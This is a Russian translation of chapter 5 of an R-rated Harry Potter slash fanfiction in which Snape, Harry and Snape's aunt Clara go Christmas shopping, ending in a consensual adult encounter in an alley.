Mistletoe (Омела)

Автор: Forever then some
Перевод: Kirrsten
Бета: Laconic
Пейринг: ГП/СС
Категория: Слэш
Рейтинг: R
Жанр: Humor/Romance
Статус         закончен.
Disclaimer:  Эта история написана только для развлечения, а ни как не для получения прибыли.
Разрешение на перевод:  получено.
Оригинал: здесь

Глава 5

Клара говорит  правду, но не слышит её.

Наш  герой слышит правду, но игнорирует её.

И целых два раза правду говорит Гарри, но  он её и так знает.

 

Когда следующим утром Северус вышел из ванной, полностью одетый и готовый к новому дню, Гарри все еще крепко спал. Кошмары, мучившие его ночью,  прекратились всего несколько часов назад, и теперь он спал достаточно спокойно, не считая редкого мягкого шипения, срывавшегося с губ.

Северус подумал, что после беспокойной ночи Поттеру действительно нужно выспаться, как раз в тот момент, когда пнул ногой по столбику кровати.

Гарри заворчал во сне и вытянул руку поперек матраца. Не дождавшись иной реакции, Северус снова стукнул по кровати. На сей раз Гарри перекатился на живот, пробормотав что-то себе под нос. Что именно, Северус не разобрал, но, несомненно, что-то не очень галантное.

Длинные ноги Гарри запутались в простынях, обтягивающих бедра и выставляющих на обозрение около шести дюймов гладкой плоти – пижамная рубашка задралась на спину. Подобрав с ночного столика палочку, Северус бросил заклинание, сделав её конец просто ледяным, затем подошел к спящему и провел палочкой по  оголенной спине сверху вниз. Гарри рассерженно зашипел во сне, но Северус продолжал свое занятие, пока тот не сдался:

– Перес-с-с-стань, я прос-снулся.

Северус остановился и спрятал палочку в потайной карман:

– Тебе известно, что ты иногда говоришь на парселтанге во сне?

Сонный, Гарри уселся на кровати, потирая воспаленные глаза:

– Ну, прости. Такое бывает только тогда… – он оборвал сам себя и вспыхнул. – Надеюсь, я тебя не разбудил?

Северус улыбнулся: ему стало любопытно, как молодой человек собирался закончить предложение, если бы не опомнился. Только когда?.

До завтрака приведи себя в порядок. Ужасно выглядишь.

Гарри фыркнул и взлохматил и без того взъерошенные волосы, потом свесил ноги с кровати: 

– Спасибо. Это только ты поднимаешься по утрам с кровати свежий,  как маргаритка.

Спотыкаясь, он побрел в ванную, где, облокотившись о раковину, первым делом  сосредоточился на своем отражении в зеркале. Темные круги под глазами, стоящие дыбом волосы, кожа, кажущаяся мятой и липкой.

Одно Гарри смог сформулировать четко: Снейп прав − выглядит он кошмарно.

– А где Гарри?

– А где «доброе утро, Северус»? Или «как спал, дорогой племянник»? Только «где Гарри?», – забрюзжал Снейп, появляясь в кухне и обнаружив нетерпеливо ожидающую за столом тетушку.

– Доброе утро, Северус. Теперь о Гарри…

– Он проспал. Спустится минут через пятнадцать.  

– Хорошо. Потому, что нам надо поговорить. 

– А могу я сначала выпить чаю? – проворчал Северус с таким видом, будто только что выпил раствор едкой щелочи.

– Не надо разговаривать так, будто тебя обрекают на казнь.

Северус поставил на огонь воду и повернулся к тете, чувствуя себя как, должно быть, чувствуют себя те несчастные, которых приговорили к Поцелую дементора.

– Ладно, давай приступим.

– Давай. Обсудим твои проблемы.

– Отлично. Все началось с того, что шестьдесят с лишним лет назад, когда ещё мои родители были детьми, девочка по имени Клара… 

Трость моментально опустилась в сантиметре от его ног:

– Если тебе дороги твои конечности, не богохульствуй.

– Не считаю это богохульством. Ты, тетя, конечно, способна на многое, но, к счастью, не подобна Богу.

– Пф-ф! Мы говорим не обо мне. О тебе. И твоей проблеме. Сегодня мы пойдем по магазинам.

– Моя проблема состоит в том, что  я мало хожу по магазинам? Или это просто предупреждение, что у меня возникнет проблема: ты  и поход с тобой по магазинам за несколько дней до Рождества? Но, если ты думаешь, что я соглашусь, это – твоя проблема.

– Твоя проблема – Гарри.

– Понятно, – Северус отставил коробку с чаем и теперь разыскивал сахар. – У тебя возникли проблемы с Гарри?

– Нет, у тебя. Полагаю, что он привык и находит подобные несовершенные отношения достаточно удобными. У меня сложилось впечатление, что Гарри не будет возражать, если вы вообще никогда не поженитесь, оставив все как есть. Сомневаюсь, что раньше он не хотел этого, скорее всего, твоя неприязнь к браку повлияла и на него. Мальчик, вероятно, оставил надежду на женитьбу.

– Значит, дело сделано, – беспечно отозвался Северус.

Клара сарказм проигнорировала:

– Все, что требуется от тебя – напомнить ему, как хорошо вам может быть вместе. Заставь его чувствовать себя любимым и желанным.

– О да, мечта всей моей жизни – дать Гарри Поттеру почувствовать себя особенным.

– Нет, – деловито возразила Клара. – Твоя главная цель – жениться на мальчике.

– Но для начала я должен найти для него особенный подарок. Ты что-то говорила о походе в магазин. Не знаю, как долго я буду выбирать что-то совершенное…

– Ценен не подарок, а внимание, Северус.

– Я слышу, тут кто-то упоминает подарки? – с задорной усмешкой поинтересовался появившийся в кухне Гарри.

– Не хочешь пройтись по магазинам, Гарри? – спросила Клара.

Гарри достал из буфета три чашки и поставил около чайника:

– Поход за покупками?

– Да.

– И где мы собираемся гулять? – зарычал Снейп.

– Я заметила, что автомобиля у вас нет, а я сюда на такси добралась. Но до центральной улицы недалеко. А там предостаточно магазинов.

– Аптека, хозяйственный магазин, скобяная лавка, лавка с дешевым антиквариатом, магазин одежды и почтовое отделение, – перечислил Северус. – Не очень подходит для похода за покупками.

Чайник засвистел, и Гарри налил воду в чашки:

– Я с радостью пойду, Клара.

– Чудесно. Спасибо, Гарри, милый.

– Я был уверен, что ты не устоишь, маленький подлиза, – пробормотал Северус.

– Что ты сказал? – Гарри улыбнулся кончиками губ.

– Я сказал, что был уверен, что ты с удовольствием пойдешь.

– Эту часть я слышал.

– Это все.

– Лжец, – молодой человек слегка толкнул его локтем.

– Тетя, ты видела, как он со мной отвратительно обращается?!

Клара лишь мельком глянула на них, не теряя невозмутимости:

– Кто-то ведь должен…

Гарри усмехнулся, очень желая быть этим  кем-то.

 

Магазин на углу.

 

Маленький колокольчик на двери бакалейного магазина весело звякнул, когда Снейп открыл  дверь, пропуская Клару, а затем вошел сам, позволяя стеклянной двери закрыться перед носом Гарри, идущего сзади. Внутри находилось всего несколько детишек и  пожилых дам, выбирающих товар на скудно обставленных полках. Гарри – что можно было предсказать со стопроцентной точностью – направился прямо к стеллажу с ярко упакованными сладостями. Клара величественно прошествовала по проходу, выставив вперед трость и свысока разглядывая товар. Это заставило Северуса остаться стоять у двери, скрестив руки на груди.

Десять минут спустя Гарри все еще торчал у полок со сластями, держа пакет ярко-оранжевых леденцов, обещавших изменить цвет языка. Ему стало интересно, имеют ли Фред и Джордж подобный товар в своем распоряжении и не захватить ли пакетик для близнецов?.. Можно добавить к Рождественскому подарку… Его размышления были прерваны  знакомым толчком трости. Улыбаясь, он повернулся.

Клара посмотрела на пакеты в его руках и произнесла:

– Северус не любит леденцы. И даже в детстве не ел их.

– Это не для него, – объяснил Гарри. – Для друга.

– А ему?

– Простите?

– Не будь тупым. Что ты подаришь Северусу на Рождество?

Гарри был готов к этому вопросу:

– Книги. Три редких рукописи, на которые он мне намекал. Я уже их упаковал и сложил дома под елкой. – Если быть откровенным, Гарри взял три первые попавшиеся книги с полок наверху и преобразовал газету в упаковочную бумагу, чтобы завернуть их. Он решил, что отговорка подходящая.

– Пффф. Как будто у него мало книг!

– У меня есть ещё кое-что, более… личного характера, – оставалось надеяться, что Клара намек поймет и подробностей не потребует, потому что Гарри понятия не имел, что личного может подарить один мужчина другому.

Со своего наблюдательно пункта у двери, Северус прекрасно видел, как тетушка подплыла к Поттеру. Они немного поговорили, и, сначала,  Поттер явно нашелся с ответом, но после принялся что-то нервно лепетать, то ли отбиваясь, то ли оправдываясь, уши его покраснели, а взгляд нервно забегал по магазину. Клара мучила мальчишку довольно долго, затем направилась к кассе. При этом она казалась вполне удовлетворенной.  Гарри же, напротив, выглядел так, будто вот-вот упадет.

Покинув магазин, Гарри заметил группку детей, собравшихся на тротуаре вокруг большой картонной коробки. Он понял, что там такое, когда женщина сняла крышку и достала маленького черного щенка – еще несколько темных пушистых головок еле-еле доставали до края коробки. Это были самые удивительные маленькие щенки, которых когда-либо видел Гарри. Оставив Снейпа и Клару перед бакалеей, он двинулся в ту сторону, чтобы рассмотреть получше.

Далеко он не ушел. Северус схватил его за руку и, с силой потянув назад, прошипел:

– Даже не думай об этом! 

– Что?..

– Тетя наблюдает. Вот сейчас, когда мы просто разговариваем, она внимательно следит за тобой, обдумывая, какой особенный подарок я могу купить для тебя. Если она увидит, как ты несешься к этим шавкам и скачешь возле них, она вынудит меня купить для тебя щенка. Очень неприятно, если это случиться.

Гарри посмотрел на щенят и злорадно улыбнулся. Они были еще крохами, но у каждого имелись непропорционально большие острые уши и крупные лапы. Они энергично лаяли и подпрыгивали, стараясь все увидеть. Мысль об одном из этих милых созданий в доме Северуса, их совместном сосуществовании,  была чрезвычайно забавна:

– Но, Северус, ты только подумай, какой незаменимый опыт мы приобретем, раз уж собираемся иметь четверых детей. Хммм, возможно, стоит громко упомянуть о них в присутствии Клары.

– Слушай меня внимательно, Поттер. Если моя тетя купит одного из них для тебя, и он доберется со своими слюнями до моего дома…  уверяю, в день, когда тетушка покинет город, я смогу заняться зельем Долголетия. – Гарри озадаченно уставился на Снейпа. Тот с мученическим вздохом закатил глаза: – Угроза была бы более эффективной, если бы ты достаточно долго посещал мои занятия и знал, что основной ингредиент  зелья Долголетия – селезенка маленьких собак.

Гарри в ужасе посмотрел на милых, прыгающих кутят, с огромными пронзительными карими глазами:

– Ты бы не…

– Вперед! – угрожающе ответил Северус. – Беги к ним. Но потом не обижайся на меня.

Гарри отвернулся от щенков и ни разу не оглянулся.

Придется несколько раз упомянуть при Кларе, что у него аллергия на всех домашних животных.

 

Магазин одежды.

 

Гарри не простоял в одиночестве и минуты, как к нему приблизился продавец. Он был великолепен: не старше восемнадцати-девятнадцати лет, с кожей, цвета кофе мокко, короткими каштановыми волосами и озорной усмешкой.

– Вы недавно в городе? – Гарри с отсутствующим видом пробормотал подтверждение, спрашивая себя, как он умудрился потерять Клару и Северуса  в магазине размером в две обувные коробки. – Я так и знал. Если вы живете в таком маленьком городке, то знакомы со всеми. Особенно с молодыми, сексуальными парнями. – Гарри улыбнулся тому, насколько смелым оказался паренек. – Марк, – представился тот, протягивая руку.

Гарри пожал её:

– Гарри.

Марк улыбнулся, обнажая ряд идеальных, белых зубов:

– Итак, чем могу помочь, красавчик?

– Пока я просто смотрю.

– Уверен, мы сможем подобрать что-нибудь горяченькое для вашего тела…

Гарри едва сдержал удивленный смешок, не потому, что слова клерка были смешны, но потому, что тот был достаточно глуп, чтобы заявить такое вслух и ожидать, что Гарри  попадется.

– В самом деле, не стоит беспокоиться. Я просто смотрю.

– Никакого беспокойства. Какой у вас, тридцатый размер? Или тридцать второй? – Марк потянулся и положил руки Гарри на талию, как будто это могло помочь с определением размера.

Гарри открыл было рот, чтобы поставить на место самонадеянного подростка, но не успел.

БУМ!

– Надеюсь, у вас найдется подходящее оправдание, чтобы щупать моего племянника?!

Гарри отодвинулся с огорченной улыбкой:

– Племянник – это я?

– Будешь, совсем скоро, – фыркнула Клара, перед тем как вновь взяться за мальчишку. – А вы... Ваши услуги нам не требуются.

– Я только хотел помочь...

Клара покачала тростью в его направлении:

– Я точно знаю, чего ты хотел. Так что больше не отнимай у меня время.

Подмигнув на прощание Гарри, Марк исчез в подсобке.

К ним подошел Северус:

– Проблемы?

Клара усмехнулась:

– Какие в наши дни наглые молодые люди! Этот клерк распускал руки с Гарри. И непочтительно подмигивал, – Клара многозначительно посмотрела на Гарри. – И перестань ухмыляться. Ты и сам небезупречен.

– Что я такого сделал?

Вы позволяли ему флиртовать с Вами, мистер Поттер.

– Мистер Поттер? – переспросил Гарри, улыбаясь.

– Моя тетя любит пользоваться фамилиями, думает, что это очень модно, –  пояснил Северус, явно не придавший значения случившемуся.

– Прекрати впустую сотрясать воздух, – Клара засопела и пристукнула тростью.

– Право же, Клара, я контролировал ситуацию. Он не флиртовал, а просто старался услужить.

Клара жалостливо покачала головой:

– Ох, Гарри, ты наивен, как ягненок. Тебе следует с большим подозрением относиться  к незнакомцам.

Северусу стало интересно, что бы сказала Клара, узнав, что её  ягненок  самый сильный маг, сражавшийся с Темным Лордом с самого рождения. 

– Клара, все в порядке. Я достаточно взрослый, чтобы не брать леденцы у незнакомцев.

– Х-р-ф-ф-ф. Если захочешь пососать леденец, удостоверься, что берешь его у  Северуса, – Клара, стуча тростью, удалилась.

Гарри смотрел ей вслед:

– Она действительно это сказала?

– Так и есть.

– Значит, теперь ты – мой сладенький папочка?

К счастью для Гарри, сначала Северус понял только, что фраза маггловская, и потребовалось минута, чтобы до него дошел весь смысл, что позволило юному нахалу сбежать.

Магазин оказался довольно большим, к этому выводу Гарри пришел десять минут спустя. Одежда была интересной и выглядела удобной. Он вообще не ходил по магазинам одежды, полагаясь главным образом на Гермиону,  Джинни и Молли, которые дарили ему необходимые вещи уже много лет на дни рождения и прочие праздники. Но, тем не менее, отложил для примерки несколько пар джинсов и  теперь стоял перед стойкой с футболками и легкими джемперами, рассматривая ярко-изумрудный  джемпер c черной каймой и глубоким вырезом.

– Гарри, дорогой, ты просто обязан примерить его, – откуда-то сзади посоветовала Клара, ободряюще подталкивая его тростью. – Очень подходит к твоим глазам, а, значит, это любимый цвет Северуса. Он  не сможет удержаться, чтобы не прикоснуться к тебе!

Гарри  мог бы поспорить, но примерка вреда не причинит. Он захватил зеленый джемпер и джинсы, на которые положил глаз, и направился  к примерочной кабинке, прикрытой занавеской.

Он только-только вылез из собственных джинсов и приготовил новую пару, когда услышал голос из-за занавески. Марк.

– Гарри? Я видел, что вы взяли кое-что для примерки, но лучше я принесу другую рубашку. Уверен, вам понравится. Новая модель, черная, с глубоким вырезом, очень горячая, вам обязательно нужно её примерить!

– Несомненно, только подожди минуту. Я пока примерю это.

– Нет проблем! Я только забегу на минутку...

– Не стоит! – приказал выросший как из-под земли Северус. – Только тронь занавес пальцем и потеряешь всю руку. 

– Я просто предложил…  я оставлю ее вот тут, на стуле, Гарри! – и молодой человек  моментально испарился с глаз. 

Через некоторое время Гарри выглянул из кабинки и увидел Снейпа,  прислонившегося к стене напротив и с негодованием осматривающегося вокруг.

– Спасибо. Ты знаешь за что…

– Я сделал это только ради тети, а не ради тебя, глупый мальчишка. Она бы разволновалась, если бы я спокойно наблюдал, как  ребенок ломится в кабинку. Думаю, ей понравилось, что я защитил тебя. 

 

И не только Кларе.

Антикварная лавка.

 Гарри шел вдоль загроможденных полок антикварного магазина, иногда останавливаясь, чтобы поближе рассмотреть странные маггловские вещи, которые Артур Уизли наверняка нашел бы привлекательными. Действительно,  для него здесь легче всего было найти подарок – что-нибудь типа модели самолета, или радио, или даже простого маггловского инструмента: молоток или веник очаровали бы его.

Гарри остановился перед полкой, заставленной старинными ступками и пестиками. Особенно выделялась одна пара. Сделанная из черного фарфора,  она выглядела вполне традиционно, но при этом весьма неплохо. Хммм,  возможно, он должен сделать Северусу настоящий  Рождественский подарок,  после всего… Или Северус подумает, что это глупо? Гарри поглядел поверх полки на Снейпа, которому явно наскучил стенд  с другой стороны магазина. Гарри попробовал представить ситуацию, в которой зельевар с благодарностью  принял бы подарок от Гарри Поттера вместо того, чтобы задохнуться от негодования.

– Человек из Тупика Прядильщиков!

Гарри немедленно повернулся на новый голос.

Женщина почти прислонялась к его плечу, глядя в том же направлении, что и он. Приблизительно лет сорока, блондинка, с пробивающейся сединой.

– Простите?

– Тот жуткий мужчина у двери. Живет в Тупике Прядильщиков.

– И что это значит?

– Ой, вы, должно быть, очень плохо знакомы с городом, если не слышали слухи.

– Какие слухи? – оживился Гарри.

Женщина выглядела довольной фактом, что нашла благодарного слушателя и подходящего человека для сплетен:

– Говорят, что никто никогда не видел его в городе покупающим еду. Один раз в год, летом, в воскресенье, он оставляет дом, чтобы пойти на рынок у реки. Всегда покупает бушели странных трав и специй, но ничего другого.

– Правда? – спросил Гарри,  с преувеличенным вниманием глядя на собеседницу. – А что же тогда он делает здесь сейчас?

– Это и странно.

– Возможно, я мог бы спросить его… – мило предложил Гарри.

– О, нет. Не надо! – испуганно предупредила женщина. – Даже невозможно предсказать, что он способен с вами сделать! 

– Меня это не очень волнует, – криво усмехнулся молодой человек.

– О, но я ещё не рассказала вам главное.

– Что-то ещё?

– Разумеется, – самодовольно ответила блондинка. – Дом, где он живет, в конце Тупика Прядильщиков, всегда закрыт и темен.  Ходят легенды о странных звуках и странных запахах оттуда. И есть слухи, что его посещают... привидения.

– Правда? Как забавно! Привидения!

– В дни моей молодости там жила одна семья: очень странная пара и их угрюмый маленький сын. Только в один прекрасный день мальчик исчез. Никогда о нем никто не вспоминал, не ведал, что с ним случилось, его больше никто не видел.

Гарри  заговорщицки понизил голос:

– У меня есть предположение…

– Да?

– Да. Я думаю, что мужчина из Тупика Прядильщиков и есть тот самый мальчик. Просто… он вырос.

– Представить не могу! – шокировано пробормотала женщина.

– И у меня есть ещё одно предположение, почему он пришел в город сегодня.

– Пожалуйста, поделитесь!

– Но это только мое собственное, личное мнение… – Женщина нетерпеливо кивнула. – Он  сегодня здесь, в этом самом магазине, для того, чтобы в последнюю минуту сделать небольшие  Рождественские покупки, презент для  fiancé.

Женщина выглядела смущенной:

– О, я не думаю, что у него может быть fiancé. Только посмотрите на него. Он испугает до смерти любого, кто подойдет достаточно близко. 

Гарри усмехнулся и позвал:

– Северус, Северус, иди сюда!

– Что? Что? – женщина побледнела, подобно рыбе открывая и закрывая рот. 

– Хочу познакомить вас с моим fiancé. – настаивал Гарри, нетерпеливо поджидающий без особого энтузиазма приближающегося Снейпа.

Мужчина остановился невдалеке, глядя только на Гарри и игнорируя его собеседницу:

Ты  вопил?

– Сев, любимый, – тепло произнес Гарри, подойдя к нему и обняв за талию. Затем повернулся к женщине и пристально уставился на неё: – Мне жаль, я не расслышал вашего имени…

– П... Петти, – заикаясь, ответила та.

– Отлично, Петти. Это мой fiancé Северус, – Гарри продемонстрировал большое обручальное кольцо с изумрудом, искрившееся в тусклом свете магазина. – Северус, Петти только что рассказала мне абсолютно очаровательную историю. Очевидно, люди думают, что  у нас дома обитают привидения.

– Разве не так? – промурлыкал Северус, не делая попытки вернуть Гарри нежное прикосновение, но и не отталкивая его.

Гарри посмотрел на блондинку с улыбкой:

– О, у меня есть блестящая идея, почему бы вам сегодня вечерком не зайти к нам на ужин, Петти? У вас бы появилась возможность проверить слухи насчет призрака.

– Я... Я… Я  должна идти, – женщина почти побежала по проходу.

– Пока, Петти! Увидимся!  – жизнерадостно прокричал ей вслед Гарри.

Северус зафыркал, выбираясь из его объятий:

Проявляются твои слизеринские черты.

Гарри пожал плечами, все еще улыбаясь:

– Любопытная сплетница заслужила это.

Северус поднял глаза к небу, в то время как Гарри отправился в другой отдел магазина.

Десять минут спустя Северус все еще наблюдал, как Поттер копается в маггловских наборах инструментов для обработки древесины. Все было просто прекрасно, до того момента, как до него дошло – слишком поздно – что Клара внимательно наблюдает за ним, в то время как он сам следит на Гарри.

– Почему ты ведешь себя именно так?

– Именно как? – обманчиво спокойно спросил Северус, безразлично снимая  с полок и, бросив слепой взгляд, возвращая на место какие-то мелочи.

– Так уставился на него?

– А как, по-твоему, я должен смотреть на своего fiancé?

– Не так.

Северус подошел к прилавку с декоративным оружием и провел пальцем по лезвию одного из ножей. Интересно, почему хозяин магазина не прячет подобные вещи хотя бы в стеклянную витрину?

 Так – это как?

– Будто ты предпочел бы быть с ним рядом, а не пялиться на него через всё помещение, но не можешь заставить себя преодолеть это расстояние. Как будто ты думаешь, что он не будет рад твоей компании.

– Ты придаешь слишком большое значение простому взгляду, тетя.

– Я?

– Ты.

– Кххрр, – хрюкнула явно неубежденная Клара.

Северус повертел в руках ещё несколько острых ножей, поражаясь  грубости маггловского оружия, и вернул их на место.

– Ты – назойливая старая курица, ты знаешь об этом?

– Пффф. Если бы кто-нибудь другой сказал подобное, я приняла бы это за оскорбление.

– Понимай, как хочешь, – сухо отозвался Снейп.

– Я не сую нос не в свое дело, я просто люблю. А знаешь, почему я очень люблю тебя?

– Уверяю, был бы поблизости стул, я бы сел.

Клара проигнорировала сарказм:

– Потому что ты очень похож на меня.

Северус выгнул бровь:

– Если бы ты сказала это другому человеку, он посчитал бы это оскорблением.

– А ты нет?

– Нет.

Клара самодовольно заулыбалась и, схватив племянника за руку, потащила в сторону Гарри:

– А сейчас я хочу заняться  Рожественским подарком для Гарри от тебя.

  Скобяная лавка.

 Гарри блуждал по отделу для конструирования, напуганный кошмарным количеством разных винтиков и гвоздей, когда сзади приблизился злорадно ухмыляющийся  Снейп.

– Что она ищет? – опасливо поинтересовался Гарри.

Северус наклонился и ядовито ответил:

– Я знаю, что она хочет подарить тебе на Рождество.

– Боже, надеюсь, что-то не слишком дорогое? Я чувствую себя ужасно. Она думает, что этот подарок − для избранника племянника, а не человека, случайно оказавшегося у тебя в доме! Я не заслужил подарка от Клары.

– В любом случае, вряд ли ты сможешь им воспользоваться.

– Ммм?

– В качестве Рождественского подарка тетя предложила устроить тебе посещения доктора Н. B. Snowe.

– Кто это?

– Ведущий психиатр в маггловском Лондоне. – Северус выдержал паузу для создания драматического эффекта: – В этом году ты получишь в подарок душевное здоровье.

Гарри застонал:

– Она не может…

– Может. Думаю, она решила, что единственный способ женить меня –  спасти твою психику.

– Ты должен отговорить её!

– Только представь себе: «Тетушка! Спасибо, но нет! Мне и чокнутый муженек нравится!» Она начнет подозревать!

– Говори что хочешь! Скажи ей, что я уже в порядке после лечения у своего врача. Скажи, что новые доктора делают меня нервным. Не хочу, чтобы она тратила время и деньги на бесплодные попытке вылечить меня.

– Почему тебя это так волнует?

– Потому что я полюбил её, мы уже говорили об этом.

– Ты любишь  мою тетю.

Так же, как и ты. Даже не спорь.

– Я и не спорю.

– Отлично. Мы любим твою тетю, – Гарри оглянулся.

– Ну… ладно, – наконец ответил Снейп, смотря ему в глаза. – Я люблю её. Ты тоже. 

Они так и  стояли, уставившись друг на друга, словно состязаясь между собой силой взглядов, посреди  прилавков с гвоздями и железками.

– Не то, чтобы тема мне не нравилась, но мы же пришли за покупками? Или нет?

Мужчины одновременно повернулись, чтобы посмотреть на Клару, появившуюся в проходе.

– Идемте, я нашла кое-что, что поможет нам закончить оформление дома к Рождеству.

Погруженные каждый в свои мысли, Гарри и Северус покорно брели позади Клары. Она остановилась рядом с одной из корзин с рождественскими украшениями:

– Вот.

– Омела? – засомневался Северус.

– Да, омела, – настойчиво произнесла Клара, вытаскивая несколько зеленых веточек с белыми ягодами. – Она принесет вам удачу в браке.

Гарри усмехнулся. Северус фыркнул.

– Это правда. В языческие времена верили в Бальдера, бога света, который был убит стрелой, сделанной из омелы. Но все его так любили, что его мать Фригг и другие боги воскресили Бальдера. Фригг была настолько счастлива и благодарна, что расцеловала каждого из них под омелой, отсюда традиция – стоящие под омелой должны поцеловаться. Это принесет удачу, любовь и богатство.

– Ой, пожалуйста, – усмехнулся Северус. – Омела – ядовитое растение-паразит, крадущий у деревьев жизненные соки. 

– Это так романтично, – вздохнул Гарри, прикладывая руку к сердцу.

– Гарри, дорогой, – Клара коснулась его руки. –  Думается мне, что ты нуждаешься во всей удаче, которая только может быть.

Гарри взял омелу и улыбнулся Северусу яркой дерзкой улыбкой, заставив того напрячься в ожидании чувства неудовлетворенности. Этого не случилось. Единственный эффект на сей раз проявился в очень приятном ощущении теплоты и близости.

Ужасно.

– Я подожду на улице, пока вы двое закончите. Мне нужно на воздух.

– Северус, ты хорошо себя чувствуешь? Выглядишь немного зеленым, –  нахмурилась Клара.

– Прекрасно, – Северус развернулся и исчез за дверью. 

– Почему бы тебе не посмотреть, как он там, Гарри, милый? – не просьба, а приказ. – Я сама тут закончу.

Гарри нашел Северуса с другой стороны здания, в переулке, вымощенном булыжником, между бакалеей и скобяной лавкой. Он остановился в шаге-другом, отметив напряженное, изможденное лицо Снейпа, но диагноз поставил неправильный:

– Да ладно тебе. Это только растение. Оно не заставит меня наброситься и принуждать тебя.

Момент он, явно, выбрал не тот. Руки Северуса взметнулись, хватая Гарри за бедра, притягивая почти вплотную, загоняя в ловушку. Черные глаза горели совершенно диким светом:

Какое облегчение, знать, что ты не будешь принуждать меня.

– Сев… ах… – неважно, что Гарри хотел сказать, он лишь судорожно выдохнул, когда Северус вклинился коленом между его бедер, притягивая еще, еще ближе. Яркие изумрудные глаза распахнулись, дыхание сбилось.

– Так, значит, тебе нравится? – грубо потребовал Северус. Ему было интересно, экспериментировал ли Гарри раньше когда-нибудь с другим мужчиной. Мысль, что он может быть у Гарри первым – хотя бы в этом – опьяняла.  

– Что мы делаем? – Гарри с трудом справился с голосом.

– Ты взрослый человек, Поттер, так что какое-то представление должен иметь. Мне остановиться? – прошептал Северус, не отвечая на вопрос. Он развернулся так, чтобы Гарри оказался прижатым к кирпичной стене магазина, и откинул полы его пальто, впуская холодную струю зимнего воздуха. Почти сразу же он почувствовал, как Гарри ритмично трется об него бедрами. Обернув собственный черный плащ вокруг них, чтобы хоть немного укрыться от посторонних глаз, он выдвинул колено повыше, позволяя Гарри скользить по нему в нужном темпе:

– Тебе нравится?

– Северус…

– Северус – да или Северус – нет?

– Северус-с-с-с, пожалуйста, – услышал он в ответ теплое дыхание, сопровождаемое задыхающимся потоком шипения и превращающееся в легкие облачка на морозном воздухе.

Только теперь Северус понял, почему Гарри так смутился этим утром и покраснел, не желая объяснять свой парселтанг. Какое  интересное развитие. Шипящий рот просто требовал, чтобы его целовали, тогда как звуки, которые он издавал, требовали вынудить его замолчать.

Северус поддерживал Гарри у стены, прижимаясь к нему всем телом.  Снег хрустел под ногами, когда они, не говоря ни слова, продолжали тереться друг о друга, и жар их соприкасающихся тел  был просто зноен, по сравнению с замерзающими спинами и открытыми лицами.

– Ссс…Северуссс, – Гарри, задыхаясь, уткнулся лбом в плечо Снейпа и   обнял рукой за шею, коленями охватывая бедра мужчины.

Северус немного отодвинулся, подхватывая Гарри, придерживая и направляя движение бедер, яростно трущихся через многочисленные слои зимней одежды.

Какая-то часть Северуса еще была способна анализировать, можно ли их увидеть с улицы?  И если да, что именно увидят? Двух мужчин, сжимающих друг друга в странном объятии? Привлекают ли движения их тел  внимание? Он знал заклинание, которое могло скрыть их от посторонних глаз, но был не в состоянии  вспомнить его сейчас.

Когда  движения Гарри стали более беспорядочным, а дыхание ускорилось,  Северуса перестали волновать проблемы внешнего мира. Он ещё плотнее  обернул вокруг них развивающийся плащ, создавая ложное чувство безопасности и скрытности. Соблазнительное шипение прекратилось, и он, посмотрев вниз, увидел, что Гарри закрыл глаза и закусил нижнюю губу, подавляя вскрик. Совсем скоро характерная дрожь сотрясла тело, и его накрыл оргазм. Прижавшись сильнее, Северус грудью чувствовал затрудненное дыхание молодого человека. Он хотел насладиться не только горячей страстью, которая бурлила между ними, но и вспыхнувшим чувством близости, принадлежности.

 Но разве он принадлежит ему? Ведь Гарри женится на Джинни. Эту мысль Северус отогнал прочь. Ладно, теперь это не проблема. В конце концов, Гарри не тот человек, чтобы развлекаться на стороне  с мужчиной,  планируя жениться на женщине. Он до отвращения порядочен. Не так ли?

Наконец Гарри поднял голову:

– Ты же не… ты хочешь? 

Северус слабо качнул головой:

Позже. Возможно, в более подходящем месте.

Гарри покраснел, только сейчас вспомнив, где они находятся. Он бросил заклинание, очищая джинсы, и отодвинулся, поправляя пальто.

– Северус? Гарри?

Оба виновато оглянулись.  Клара, держа в руках кучу пакетов, стояла у входа  в переулок и смотрела на них.

– Бога ради, что с вами двумя произошло?! Идем же! Пора домой!  

Гарри позволил ворчащему про себя Северусу пройти вперед.

– Я первый бы перечислил все недостатки моей тетушки, но, по крайней мере, выбор времени у неё значительно улучшился.

Гарри улыбнулся. После всех этих лет, происходящее между ним и Снейпом, наконец начало обретать смысл. Во всяком случае, они уже не пытались перегрызть друг другу горло.

Два часа спустя, придя домой, Гарри был готов просто придушить Северуса.

Клара наверху упаковывала и прятала свои подарки, а Гарри со Снейпом сидели в гостиной-библиотеке-кабинете и расслаблялись. Ну, ладно, расслабиться пытался Гарри, устроившийся на диване, а Северус  сидел на стуле с открытой книгой на коленях и высокомерно ухмылялся. Это выражение превосходства и самодовольства не сходило с его лица с тех пор, как они вышли на дорогу, ведущую из города.

Будто он первый человек, который совершил ужасно трудный подвиг – позволил  двадцатичетырехлетнему мужчине испытать оргазм.

…Будь у него возможность, он мог бы это сделать за пять минут, не используя ни руки, ни рот…

Тем не менее, Гарри думал, что Северуса нужно поставить на место.  Правда, не таким способом, как это случилось дальше.

 

Что вовсе не означает, что он вообще не наслаждался происходящим… 

 

– Никак не могу найти очки, – топая вниз по лестнице, проворчала Клара.

Гарри поднялся:

– Может, я смогу найти их?

– Было бы очень мило с твоей стороны, Гарри, но не надо: уверена, они сами найдутся.

– Наверняка, – фыркнул Снейп.

– И что это значит, племянничек?

– Ничего, я просто заметил, что всегда, когда ты что-то теряешь, потеря довольно часто находится в удобное для тебя время. Должно быть, удачливость Снейпов.

– Разумеется, – успокоилась Клара. Опустив на колени Северуса тонкую красную книжку, она уселась на стул у камина.

Северус брезгливо зажал брошюрку между большим и указательным пальцами и отодвинул подальше от себя:

– Это что?

– Книга. По крайней мере, очень похоже. Гарри?

Тот оглянулся:

– И правда, очень похоже на книгу.

Клара поместила трость на колени, сложила руки и с надеждой посмотрела на Северуса:

– Я остановилась в конце седьмой главы вчера перед сном. Можешь начать читать с восьмой.

– Извини, что?.. – недоверчиво скривился Снейп.

– Ну, я не очень хорошо читаю без очков, а остановилась на самом интересном. Кто-то просто должен дочитать ее мне.

Выражение лица Северуса очень походило на выражение человека, который учуял что-то чрезвычайно вонючее. Он перевернул книгу и прочел название:

– «Трагедия у скал  Карлесстонского  Замка»? Нет, нет, миллион раз нет!

– Ой, Северус, пожалуйста, – вмешался Гарри, зная, что этим окончательно добьет мужчину.

